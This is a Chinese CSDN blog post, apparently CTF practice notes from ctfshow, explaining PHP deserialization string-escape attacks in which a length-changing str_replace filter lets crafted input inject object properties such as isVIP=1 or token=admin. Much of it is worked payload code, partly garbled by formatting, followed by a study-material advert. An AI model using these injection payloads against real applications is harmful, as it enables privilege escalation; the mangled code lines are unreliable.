php反序列化逃逸(1)

最新推荐文章于 2024-11-14 15:22:28 发布
最新推荐文章于 2024-11-14 15:22:28 发布
阅读量291 收藏 4
点赞数 3
分类专栏: 程序员 文章标签: php android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84968940/article/details/138991936
版权

$u = new user(“admin”,‘123456’);
u _ s e r = s e r i a l i z e ( u\_ser = serialize( u_ser=serialize(u);
//O:4:“user”:3:{s:8:“username”;s:5:“admin”;s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}

echo PHP_EOL;
u s = f i l t e r ( us = filter( us=filter(u_ser);
//O:4:“user”:3:{s:8:“username”;s:5:“hacker”;s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}

//过滤前,过滤后
//O:4:“user”:3:{s:8:“username”;s:5:“admin”;s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}
//O:4:“user”:3:{s:8:“username”;s:5:“hacker”;s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}

$u = new user(‘admin";s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:1;}’,“123456”);
//O:4:“user”:3:{s:8:“username”;s:52:“admin”;s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}";s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}

//";s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;} is length of 47

$u = new user(‘adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:1;}’,“123456”);
u _ s e r = s e r i a l i z e ( u\_ser = serialize( u_ser=serialize(u);
f i l t e r t e d = f i l t e r ( filterted = filter( filterted=filter(u_ser);
//O:4:“user”:3:{s:8:“username”;s:282:“hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker”;s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}";s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}
//forget of modify value of vip, it should be (int)1

o b j = u n s e r i a l i z e ( obj = unserialize( obj=unserialize(filterted);
var_dump($obj);


最终的目的是修改对象的isVIP属性为1,通过反序列化


对象u进行序列化,很正常


us对u的内容作替换,将admin替换为hacker,长度不一样,有逃逸风险  
 比如  
 `s:5:"hacker";`就是这个属性看5位,将它反序列化,内容就变成了hacke,r就逃逸了  
 原因是它本来是admin是5位,通过过滤直接替换,造成纰漏


尝试构造payload  
 `$u = new user('admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}',"123456");`  
 其中`";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}`是截取出来的


尝试逃逸  
 `$u = new user('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}',"123456");`这么多重复的admin都将被替换为hacker。admin有282个字符,全部替换为hacker后就有了逃逸的条件。让原来的序列化内容容纳下`";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}`,而长度还是282,就是读到`";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}`就结束,在反序列化时形成一个完整的对象


这样一来就可在var\_dump看到isVIP属性确实遭到更改`var_dump($obj);`


## 第二段说明
<?php class message{ public $from; public $msg; public $to; public $token='user'; public function \_\_construct($f,$m,$t){ $this->from = $f; $this->msg = $m; $this->to = $t; } } $obj = new message('fuck','b','c'); function filter($obj){ return str\_replace('fuck', 'loveU', $obj); } $objSer = serialize($obj); echo $objSer; //O:7:"message":4:{s:4:"from";s:1:"a";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";} echo PHP\_EOL; $objSerFil = filter($objSer); echo $objSerFil; //O:7:"message":4:{s:4:"from";s:4:"loveU";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";} //could flee //";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";} //fix it to //";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";} //payload(62 char) //";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";} echo PHP\_EOL; $objHack = new message('fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}','b','c'); echo serialize($objHack); $answer = 'O:7:"message":4:{s:4:"from";s:310:"fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";}'; $answer = filter($answer); echo PHP\_EOL; var\_dump(unserialize($answer)); //it works echo PHP\_EOL; echo base64\_encode($answer); ``` 这段代码来自我做ctfshow线上靶场时的记录,看上去更清晰一些吧 结合注释观察,很容易懂 结合writeup的视频的建议,新手慢点写,是容易做对的 ## 最后 **自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。** **深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!** **因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。** ![img](https://img-blog.csdnimg.cn/img_convert/d358010f5ae03e4541f5f0cf9c36c481.png) ![img](https://img-blog.csdnimg.cn/img_convert/e80ad0b5fd5ab37a97ae7c4c74339a93.png) ![img](https://img-blog.csdnimg.cn/img_convert/d155dd6d035cb58b398929928d07e2be.png) ![img](https://img-blog.csdnimg.cn/img_convert/58a93fd4fc1ba7dfe76e5630d0ba2f0d.png) ![img](https://img-blog.csdnimg.cn/img_convert/062b8d6d2bef73538e8a8018526314f0.png) **既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!** [**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875) **由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!** 你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875) **由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84968940
关注
专栏目录
php反序列化逃逸1
08-03
在安全领域,PHP反序列化逃逸是一个重要的安全问题,因为不正确的处理序列化数据可能导致代码执行漏洞。以下是关于“php反序列化逃逸”的详细解释: 1. **反序列化分隔符**: PHP反序列化的结束标记是`;}`,这意味...
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
PHP反序列化长度变化尾部字符串逃逸】是一种安全漏洞利用技术,通常出现在使用PHP的系统中。在PHP中,对象序列化是将对象转换为可存储或传输的字符串的过程,而反序列化则是将这个字符串恢复为原始对象的过程。...
php反序列化字符逃逸
leekos的博客,分享web安全相关知识~
01-04 1403
php反序列化字符逃逸
PHP反序列化字符串逃逸
Aiwin的博客
01-10 1065
PHP反序列化字符串逃逸
php反序列化逃逸
m0_63416413的博客
04-25 528
ctf反序列化逃逸,结合代码和ctf题目
CTF:PHP反序列化字符逃逸漏洞
06-16 1415
作者:高玉涵 博客:blog.csdn.net/cg_i 时间:2021.6.16 22:26、。/>/ CTF入门好难 赛后,主办方给出答案后的第77天,我终于解开了这道题。 CTF作为流行在信息安全界著名竞赛,像我这种“被赶鸭子上架的程序员”——零基础。答案都看不懂,我太难了!不了解原理和背景,资料也无从找起。输了比赛不可怕,就怕输的不明不白,抱着这种不甘,也为了探究缘故,除了努力学习别无它法,期间走了不少弯路,终得解惑。这对于我来说,没有激动与喜悦,有得只是深刻。 现将解题过程分享出
php反序列化字符串逃逸
fmyyy1的博客
04-19 464
最近经常碰到反序列化改变长度的逃逸问题,写篇笔记记一下。 在反序列化前,若对序列化的字符串进行一些替换关键字操作,如果改变了长度,则会导致一些安全问题。 在讨论这个前得先理解php反序列化时的截断问题,举例: <?php $a = 'a:3:{i:0;s:3:"123";i:1;s:3:"abc";i:2;s:4:"defg";}'; $b = 'a:3:{i:0;s:3:"123";i:1;s:3:"abc";i:2;s:5:"qwert";};i:2;s:4:"defg";}'; var_dump
CTF-PHP反序列化漏洞5-反序列化字符逃逸
Eason_LYC安全白帽子的成长博客
05-15 1984
PHP反序列化漏洞是指攻击者通过构造恶意序列化数据,使得PHP反序列化函数在反序列化时执行了恶意代码,从而导致安全漏洞。其中,反序列化字符逃逸是指攻击者在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。具体来说,PHP反序列化函数在反序列化时,会对序列化字符串中的特殊字符进行转义,例如将双引号转义为\”、将反斜杠转义为\等。攻击者可以利用这个特性,在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。?
PHP反序列化字符逃逸
xiao_he0123的博客
03-16 848
PHP序列化和反序列化前言一、PHP序列化(serialize)二、PHP反序列化(unserialize)三、魔幻函数四、PHP反序列化字符逃逸1.替换修改后导致序列化字符串变长2.替换之后导致序列化字符变短 前言 一、PHP序列化(serialize) 序列化就是将变量或者对象转换为字符串的过程 #序列化结果: o:1:"A":2:{s:4:"name";s:4:"aaaa";s:4:"pass";s:6:"123456";} //o 即object简写的对象 //1 对象的字符数(这里对象是后面
反序列化字符串逃逸(上篇)
csjjjd的博客
01-21 1219
结果:O:4:"user":3:{s:8:"username";s:3:"BTG";这里BTG从0变成了1,说明你是污染成功了的,因为我的原代码里面写死了BTG是0的,现在变成了1,所以证明反序列化是成功了。其实就到这里就搞定了,如果不放心,那就var——dump,把反序列化输出出来,
PHP反序列化字符逃逸详解
qq_45521281的博客
07-05 8462
文章目录第一种情况:替换修改后导致序列化字符串变长例题——[0CTF 2016]piapiapia第二种情况——替换之后导致序列化字符串变短实例——[安洵杯 2019]easy_serialize_php 此类题目的本质就是改变序列化字符串的长度,导致反序列化漏洞 这种题目有个共同点: php序列化后的字符串经过了替换或者修改,导致字符串长度发生变化。 总是先进行序列化,再进行替换修改操作。 第一种情况:替换修改后导致序列化字符串变长 示例代码: <?php function filter($st
php反序列化字符逃逸,PHP反序列化字符串逃逸
weixin_31008279的博客
03-26 253
经过CTF比赛了解PHP反序列化,记录本身的学习。借用哈大佬们的名言任何具备必定结构的数据,若是通过了某些处理而把结构体自己的结构给打乱了,则有可能会产生漏洞。0CTF 2016piapiapia-----反序列化后长度递增安询杯2019-easy_serialize_php-----反序列化后长度递减0CTF 2016piapiapia因为是代码审计,直接访问www.zip发现备份的源码,有一下...
PHP反序列化逃逸详解与示例
"php反序列化逃逸1" 在PHP中,序列化和反序列化是两种常见的数据存储和传输方式。序列化将对象转换为字符串,以便存储或通过网络发送,而反序列化则将字符串恢复为原始的PHP对象。在特定情况下,不正确的反序列化...
MDBook 使用指南
qq_39517117的博客
11-12 541
介绍了 MDBook 的基本使用方法,并演示了一个简单的构建过程。
C语言入门到精通(第六版)——第十六章
最新发布
qq_63485530的博客
11-14 653
3、本地网络上的其他主机接收到ARP请求帧后,检查是否与自己的IP地址匹配,如果不匹配,则丢弃APR请求帧,如果主机B发现与自己的IP地址匹配,则将主机A的物理地址和IP地址添加到自己的ARP缓存中,然后主机B将自己的物理地址和IP地址发送给主机A,当主机A接收到主机B发来的信息后,将用这些信息更新ARP缓存。在发送数据时,应用层的数据传输到传输层,加上TCP的首部,数据就构成了报文。简单来说,套接字就是一个假想的连接装置,其作用类似于插座,插座用于连接电器和电线,套接字用于连接程序和网络,完成通信功能。
【故障解决】麒麟系统右下角网络图标取消显示叹号
鹏大圣运维
11-13 1009
Hello,大家好啊!今天给大家带来一篇关于如何在麒麟系统中解决网络图标出现感叹号问题的文章。在日常使用麒麟系统的过程中,我们在内网或公网环境下,有时会遇到网络图标上出现感叹号的情况。这通常是因为系统默认的 NetworkManager.conf 配置文件中指定了一个用于网络探测的 uri 地址,当系统无法访问这个地址时,就会认为网络不通,从而显示感叹号。即便在公网环境下,有时也会遇到这种问题。今天我们就来介绍几种解决方法,帮助大家轻松排除困扰!欢迎大家分享点赞,点个在看和关注吧!
Wordpress常用配置,包括看板娘跨域等
kayotin的博客
11-14 265
搭建Wordpress博客时,一些常用配置。
TCP/IP协议,TCP和UDP区别
眷怀的博客
11-11 966
TCP/IP是用于计算机网络通信的基础协议集。包括互联网层(IP)传输层(TCP/UDP)和应用层等,确保数据在网络中可靠传输和有效路由。常见协议有等。TCP提供可靠、面向连接的服务,适合对数据传输有高可靠性要求的应用。UDP提供简单、无连接的服务,适合实时性要求高的应用。理解这些协议和它们的工作方式对于网络配置、故障排查和优化非常重要。
【cft.show-web3解题思路】-php://input伪协议
qq_62683583的博客
11-11 414
ls查看到当前目录下拥有ctf_go_go_go index.php俩文件。url payload改为xx?改为POST传参 并在请求体添加自己php代码。cat查看ctf_go_go_go文件内容。burpsuite抓包。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值